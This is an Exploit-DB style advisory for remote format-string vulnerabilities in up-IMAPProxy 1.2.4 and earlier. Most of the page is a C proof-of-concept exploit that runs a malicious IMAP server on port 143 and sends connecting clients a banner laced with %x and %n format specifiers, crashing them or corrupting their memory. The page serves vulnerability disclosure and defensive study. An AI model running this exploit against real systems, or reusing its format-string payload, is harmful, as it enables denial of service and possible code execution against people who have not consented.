up-IMAPProxy Remote Format String Vulnerabilities

vendor:

up-IMAPProxy

by:

N/A

CVSS

N/A

Remote Format String

CWE

Product Name: up-IMAPProxy

Affected Version From:

Affected Version To:

Patch Exists: Unknown

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

up-IMAPProxy Remote Format String Vulnerabilities

up-IMAPProxy is prone to multiple unspecified remote format-string vulnerabilities. Successful exploitation could cause the application to crash or to execute arbitrary code in the context of the application. Specific details of these issues are not currently known. This BID will be updated when further information becomes available.

Mitigation:

Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/15048/info

up-IMAPProxy is reported prone to multiple unspecified remote format-string vulnerabilities.

Successful exploitation could cause the application to crash or to execute arbitrary code in the context of the application.

Specific details of these issues are not currently known. This BID will be updated when further information becomes available. 

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>

#define BANNER "AAAAAAAAAA%x%x%x%x%x%n%n%n\r\n\r\n"

int main ( int argc, char *argv[] )
{
struct sockaddr_in addr, cl_addr;
int sock, cl_sock, addr_size;
char *Iaddr;
socklen_t l;

printf("Imapproxy <= 1.2.4 PoC Exploit\n");

sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);

addr.sin_family = AF_INET;
addr.sin_port = htons(143);
addr.sin_addr.s_addr = inet_addr("127.0.0.1");

bind(sock, (struct sockaddr*)&addr, sizeof(addr));
listen(sock, 5);

addr_size = sizeof(addr);

while (1) 
{
	cl_sock = accept(sock, (struct sockaddr*)&cl_addr, &l);
	Iaddr = inet_ntoa(cl_addr.sin_addr);
	send(cl_sock, BANNER, strlen(BANNER), 0);
	printf("IP: %s\n", Iaddr);
}

return 0;

}